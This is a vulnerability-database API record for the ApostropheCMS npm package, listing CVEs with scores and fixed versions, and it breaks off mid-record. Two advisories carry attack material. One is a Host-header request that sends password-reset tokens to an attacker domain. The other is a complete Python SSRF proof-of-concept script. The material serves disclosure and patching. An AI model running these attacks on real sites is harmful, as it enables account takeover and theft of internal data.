Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/971426?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/971426?format=api", "purl": "pkg:npm/apostrophe@0.5.348", "type": "npm", "namespace": "", "name": "apostrophe", "version": "0.5.348", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78332?format=api", "vulnerability_id": "VCID-1nxf-g588-c3ey", "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33877", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08901", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08945", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33877" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33877", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33877" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/e266cffd8c0d331a9b05c92bf11616556efcdc77", "reference_id": "e266cffd8c0d331a9b05c92bf11616556efcdc77", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:30:48Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/e266cffd8c0d331a9b05c92bf11616556efcdc77" }, { "reference_url": "https://github.com/advisories/GHSA-mj7r-x3h3-7rmr", "reference_id": "GHSA-mj7r-x3h3-7rmr", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mj7r-x3h3-7rmr" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mj7r-x3h3-7rmr", "reference_id": "GHSA-mj7r-x3h3-7rmr", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:30:48Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mj7r-x3h3-7rmr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api", "purl": "pkg:npm/apostrophe@4.29.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-wscg-efgt-e7bw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0" } ], "aliases": [ "CVE-2026-33877", "GHSA-mj7r-x3h3-7rmr" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1nxf-g588-c3ey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/77344?format=api", "vulnerability_id": "VCID-56a7-tu1w-fua8", "summary": "ApostropheCMS is an open-source content management framework. Prior to version 4.28.0, the bearer token authentication middleware in `@apostrophecms/express/index.js` (lines 386-389) contains an incorrect MongoDB query that allows incomplete login tokens — where the password was verified but TOTP/MFA requirements were NOT — to be used as fully authenticated bearer tokens. This completely bypasses multi-factor authentication for any ApostropheCMS deployment using `@apostrophecms/login-totp` or any custom `afterPasswordVerified` login requirement. Version 4.28.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32730", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32209", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32023", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32730" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32730", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32730" }, { "reference_url": "https://github.com/advisories/GHSA-v9xm-ffx2-7h35", "reference_id": "GHSA-v9xm-ffx2-7h35", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v9xm-ffx2-7h35" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-v9xm-ffx2-7h35", "reference_id": "GHSA-v9xm-ffx2-7h35", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-19T16:12:00Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-v9xm-ffx2-7h35" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375187?format=api", "purl": "pkg:npm/apostrophe@4.28.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1nxf-g588-c3ey" }, { "vulnerability": "VCID-7fb7-sbm9-u7fa" }, { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-pt6d-cm84-e7c4" }, { "vulnerability": "VCID-t3jk-9ttu-nfgt" }, { "vulnerability": "VCID-xez4-ydba-nfdb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.28.0" } ], "aliases": [ "CVE-2026-32730", "GHSA-v9xm-ffx2-7h35" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-56a7-tu1w-fua8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/77778?format=api", "vulnerability_id": "VCID-7fb7-sbm9-u7fa", "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in the @apostrophecms/color-field module, where color values prefixed with -- bypass TinyColor validation intended for CSS custom properties, and the launder.string() call performs only type coercion without stripping HTML metacharacters. These unsanitized values are then concatenated directly into <style> tags both in per-widget style elements rendered for all visitors and in the global stylesheet rendered for editors, with the output marked as safe HTML. An editor can inject a value which closes the style tag and executes arbitrary JavaScript in the browser of every visitor to any page containing the affected widget. This enables mass session hijacking, cookie theft, and privilege escalation to administrative control if an admin views draft content. This issue has been fixed in version 4.29.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33889", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02501", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02503", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33889" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33889", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33889" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/6a89bdb7acdb2e1e9bf1429961a6ba7f99410481", "reference_id": "6a89bdb7acdb2e1e9bf1429961a6ba7f99410481", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T11:26:46Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/commit/6a89bdb7acdb2e1e9bf1429961a6ba7f99410481" }, { "reference_url": "https://github.com/advisories/GHSA-97v6-998m-fp4g", "reference_id": "GHSA-97v6-998m-fp4g", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-97v6-998m-fp4g" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-97v6-998m-fp4g", "reference_id": "GHSA-97v6-998m-fp4g", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T11:26:46Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-97v6-998m-fp4g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373705?format=api", "purl": "pkg:npm/apostrophe@4.29.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9jxc-az1j-3qex" }, { "vulnerability": "VCID-jkpm-13y1-5yfj" }, { "vulnerability": "VCID-wscg-efgt-e7bw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.29.0" } ], "aliases": [ "CVE-2026-33889", "GHSA-97v6-998m-fp4g" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7fb7-sbm9-u7fa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360364?format=api", "vulnerability_id": "VCID-9jxc-az1j-3qex", "summary": "Apostrophe has a Weak Password Recovery Mechanism for Forgotten Password and Improper Input Validation\n## Summary\n\nApostropheCMS's password reset flow constructs the reset URL using `req.hostname`, \nwhich is derived directly from the attacker-controlled HTTP `Host` header when \n`apos.baseUrl` is not explicitly configured. An unauthenticated attacker who knows \na victim's email address can send a crafted reset request that causes the application \nto email the victim a reset link pointing to the attacker's domain. When the victim \nclicks the link, the valid reset token is delivered to the attacker, enabling full \naccount takeover.\n\n## Affected Component\n\n`modules/@apostrophecms/login/index.js` — `resetRequest` route \nPrecondition: `passwordReset: true` is set **and** `apos.baseUrl` is not configured.\n\n## Vulnerability Details\n\nThe `setPrefixUrls` middleware (i18n layer) builds `req.baseUrl` using `req.hostname`:\n\n```js\n// Simplified from i18n middleware\nreq.baseUrl = `${req.protocol}://${req.hostname}`;\nreq.absoluteUrl = req.baseUrl + req.url;\n```\n\nThe `resetRequest` handler then passes this tainted value directly into URL construction:\n\n```js\nconst parsed = new URL(\n req.absoluteUrl, // ← tainted by attacker's Host header\n self.apos.baseUrl\n ? undefined\n : `${req.protocol}://${req.hostname}${port}` // ← also tainted\n);\nparsed.pathname = '/login';\nparsed.searchParams.append('reset', reset); // real, valid token\nparsed.searchParams.append('email', user.email);\nawait self.email(..., { url: parsed.toString() }, ...);\n// Email sent to victim with URL pointing to attacker-controlled domain\n```\n\nWhen `apos.baseUrl` is configured, it is used unconditionally and the attacker's \n`Host` header is ignored — that path is **not** vulnerable.\n\n## Attack Scenario\n\n1. Attacker identifies a valid user email (e.g. from the site's public interface).\n2. Attacker sends:\n```\n POST /api/v1/login/reset-request\n Host: evil.attacker.com\n Content-Type: application/json\n\n {\"email\": \"victim@example.com\"}\n```\n3. The application emails the victim:\n```\n Click here to reset your password:\n http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com\n```\n4. Victim clicks the link; attacker's server captures `TOKEN`.\n5. Attacker calls the real target's reset endpoint with the captured token and \n sets a new password — full account takeover.\n\n## Preconditions\n\n- `passwordReset: true` configured in login module options (opt-in)\n- `apos.baseUrl` is **not** set (common in development and some production deployments)\n- Attacker knows or can enumerate a valid account email\n\n## Impact\n\nFull account takeover of any account whose email address is known to the attacker. \nNo authentication or interaction beyond sending a single HTTP request is required \nfrom the attacker. The victim need only click a link in a legitimate-looking \npassword reset email from their own site.\n\n## Remediation\n\n**Operators (immediate):** Always set `apos.baseUrl` in your configuration:\n\n```js\n// app.js or module configuration\nmodules: {\n '@apostrophecms/express': {\n options: {\n baseUrl: 'https://yourdomain.com'\n }\n }\n}\n```\n\n**Framework fix (recommended):** The `resetRequest` route should refuse to proceed \nif `apos.baseUrl` is not configured, rather than falling back to the tainted \n`req.hostname`. Example:\n\n```js\n// In resetRequest handler\nif (!self.apos.baseUrl) {\n throw self.apos.error(\n 'invalid',\n 'apos.baseUrl must be configured to enable password reset'\n );\n}\nconst parsed = new URL(self.loginUrl(), self.apos.baseUrl);\n```\n\nThis eliminates the attacker-controlled input entirely from the URL construction path.\n\n## References\n\n- [OWASP: Host Header Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection)\n- [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html)", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45013", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0014", "scoring_system": "epss", "scoring_elements": "0.34038", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45013" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-13T03:36:29Z/" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013", "reference_id": "CVE-2026-45013", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013" }, { "reference_url": "https://github.com/advisories/GHSA-gf43-24g3-5hw2", "reference_id": "GHSA-gf43-24g3-5hw2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gf43-24g3-5hw2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1164814?format=api", "purl": "pkg:npm/apostrophe@4.30.0-alpha.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.30.0-alpha.1" } ], "aliases": [ "CVE-2026-45013", "GHSA-gf43-24g3-5hw2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9jxc-az1j-3qex" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360268?format=api", "vulnerability_id": "VCID-jkpm-13y1-5yfj", "summary": "Apostrophe has authenticated SSRF in rich-text widget import via @apostrophecms/area/validate-widget\n### Summary\nApostropheCMS contains an authenticated server-side request forgery (SSRF) in the rich-text widget import flow. An authenticated user who can submit/edit rich-text widget content can cause the server to fetch attacker-controlled URLs during widget validation. For image-compatible responses, the fetched content can be persisted and re-hosted by Apostrophe, allowing response exfiltration.\n\n### Details\n The vulnerable flow is in the rich-text widget sanitizer:\n - `packages/apostrophe/modules/@apostrophecms/rich-text-widget/index.js`\n - `packages/apostrophe/modules/@apostrophecms/area/index.js`\n - `packages/apostrophe/modules/@apostrophecms/widget-type/index.js`\n\nRelevant behavior:\n 1. The backend accepts a widget payload containing `import.html`.\n 2. It parses `<img src=...>` values from that HTML.\n 3. For each image, it resolves the URL with:\n - `new URL(src, input.import.baseUrl || self.apos.baseUrl)`\n 4. It then performs a server-side `fetch(url)`.\n 5. The fetched body is written to a temp file and imported through Apostrophe image/attachment logic.\n\n This is reachable during widget validation through:\n - `POST /api/v1/@apostrophecms/area/validate-widget?aposMode=draft`\n\n\n### PoC\n 1. Start a local HTTP server with a valid PNG:\n```bash\n mkdir -p /tmp/apos-poc\n base64 -d > /tmp/apos-poc/secret.png <<'EOF'\n iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/x8AAwMCAO+y1n0AAAAASUVORK5CYII=\n EOF\n cd /tmp/apos-poc && python3 -m http.server 7777 --bind 127.0.0.1\n```\n2. Run the following Python PoC:\n```python\n#!/usr/bin/env python3\nimport argparse\nimport json\nimport sys\nfrom urllib.parse import urljoin\n\nimport requests\n\n\ndef login(base_url: str, username: str, password: str) -> str:\n url = urljoin(base_url, \"/api/v1/@apostrophecms/login/login\")\n r = requests.post(\n url,\n json={\n \"username\": username,\n \"password\": password\n },\n timeout=20\n )\n r.raise_for_status()\n data = r.json()\n token = data.get(\"token\")\n if not token:\n raise RuntimeError(f\"Login succeeded but no token was returned: {data}\")\n return token\n\n\ndef trigger(base_url: str, token: str, area_field_id: str, target_url: str) -> dict:\n url = urljoin(\n base_url,\n \"/api/v1/@apostrophecms/area/validate-widget?aposMode=draft\"\n )\n payload = {\n \"areaFieldId\": area_field_id,\n \"type\": \"@apostrophecms/rich-text\",\n \"widget\": {\n \"type\": \"@apostrophecms/rich-text\",\n \"content\": \"<p>seed</p>\",\n \"import\": {\n \"html\": f'<img src=\"{target_url}\">',\n \"baseUrl\": target_url.rsplit(\"/\", 1)[0] if \"/\" in target_url else target_url\n }\n }\n }\n r = requests.post(\n url,\n headers={\n \"Authorization\": f\"Bearer {token}\",\n \"Accept\": \"application/json\"\n },\n json=payload,\n timeout=30\n )\n r.raise_for_status()\n return r.json()\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser(\n description=\"Authenticated ApostropheCMS SSRF PoC via rich-text widget import.\"\n )\n parser.add_argument(\"--base-url\", default=\"http://127.0.0.1:3000\")\n parser.add_argument(\"--username\", default=\"admin\")\n parser.add_argument(\"--password\", default=\"admin123\")\n parser.add_argument(\"--area-field-id\", default=\"cd4f89f5b834d0036f3867f1507a8add\")\n parser.add_argument(\"--target-url\", default=\"http://127.0.0.1:7777/secret.png\")\n parser.add_argument(\n \"--fetch-image\",\n action=\"store_true\",\n help=\"Fetch the generated Apostrophe image URL after exploitation.\"\n )\n args = parser.parse_args()\n\n try:\n token = login(args.base_url, args.username, args.password)\n result = trigger(args.base_url, token, args.area_field_id, args.target_url)\n except Exception as exc:\n print(f\"[!] Exploit failed: {exc}\", file=sys.stderr)\n return 1\n\n print(\"[+] Login OK\")\n print(f\"[+] Bearer token: {token}\")\n print(\"[+] Exploit response:\")\n print(json.dumps(result, indent=2))\n\n widget = result.get(\"widget\") or {}\n image_ids = widget.get(\"imageIds\") or []\n if not image_ids:\n print(\"[-] No imageIds returned. Target may have been fetched but not persisted as an image.\")\n return 0\n\n image_id = image_ids[0]\n image_path = f\"/api/v1/@apostrophecms/image/{image_id}/src\"\n image_url = urljoin(args.base_url, image_path)\n print(f\"[+] Generated image id: {image_id}\")\n print(f\"[+] Generated image URL: {image_url}\")\n\n if args.fetch_image:\n r = requests.get(image_url, allow_redirects=True, timeout=30)\n print(f\"[+] Final fetch status: {r.status_code}\")\n print(f\"[+] Final URL: {r.url}\")\n print(f\"[+] Retrieved bytes: {len(r.content)}\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n3. Example usage:\n```bash\n python3 poc.py \\\n --base-url http://127.0.0.1:3000 \\\n --username admin \\\n --password admin123 \\\n --area-field-id cd4f89f5b834d0036f3867f1507a8add \\\n --target-url http://127.0.0.1:7777/secret.png \\\n --fetch-image\n```\n 4. Expected result:\n - The local listener receives:\n GET /secret.png HTTP/1.1\n - The API response includes a rewritten Apostrophe image URL and imageIds.\n - The generated image URL can then be fetched through the application.\n\nAdditional note:\n\n - If the target returns non-image content such as secret.txt, the SSRF still occurs, but later image processing can fail. This still allows blind or semi-blind SSRF behavior useful for internal reachability checks and rough port enumeration.\n\n### Impact\nAn authenticated user with permission to submit or edit rich-text widget content can:\n - trigger server-side requests to internal services (127.0.0.1, private subnets, etc.)\n - perform blind or semi-blind internal port and service discovery\n - exfiltrate image-compatible responses because Apostrophe stores and re-hosts the fetched content", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45012", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13471", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45012" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-pr28-mf3q-qpg6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-pr28-mf3q-qpg6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45012", "reference_id": "CVE-2026-45012", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45012" }, { "reference_url": "https://github.com/advisories/GHSA-pr28-mf3q-qpg6", "reference_id": "GHSA-pr28-mf3q-qpg6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pr28-mf3q-qpg6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1164814?format=api", "purl": "pkg:npm/apostrophe@4.30.0-alpha.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.30.0-alpha.1" } ], "aliases": [ "CVE-2026-45012", "GHSA-pr28-mf3q-qpg6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jkpm-13y1-5yfj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/72967?format=api", "vulnerability_id": "VCID-pt6d-cm84-e7c4", "summary": "ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the choices and counts query parameters of the REST API, where these query builders execute MongoDB distinct() operations that bypass the publicApiProjection restrictions intended to limit which fields are exposed publicly. The choices and counts parameters are processed via applyBuildersSafely before the projection is applied, and MongoDB's distinct operation does not respect projections, returning all distinct values directly. The results are returned in the API response without any filtering against publicApiProjection or removeForbiddenFields. An unauthenticated attacker can extract all distinct field values for any schema field type that has a registered query builder, including string, integer, float, select, boolean, date, slug, and relationship fields. Fields protected with viewPermission are similarly exposed, and the counts variant additionally reveals how many documents have each distinct value. Both the piece-type and page REST APIs are affected. This issue has been fixed in version 4.29.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39857", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09359", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09413", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39857" }, { "reference_url": "https://github.com/apostrophecms/apostrophe", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apostrophecms/apostrophe" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39857", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39857" }, { "reference_url": "https://github.com/apostrophecms/apostrophe/commit/6c2b548dec2e3f7a82e8e16736603f4cd17525aa", "reference_id": "6c2b548dec2e3f7a82e8e16736603f4cd17525aa", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", 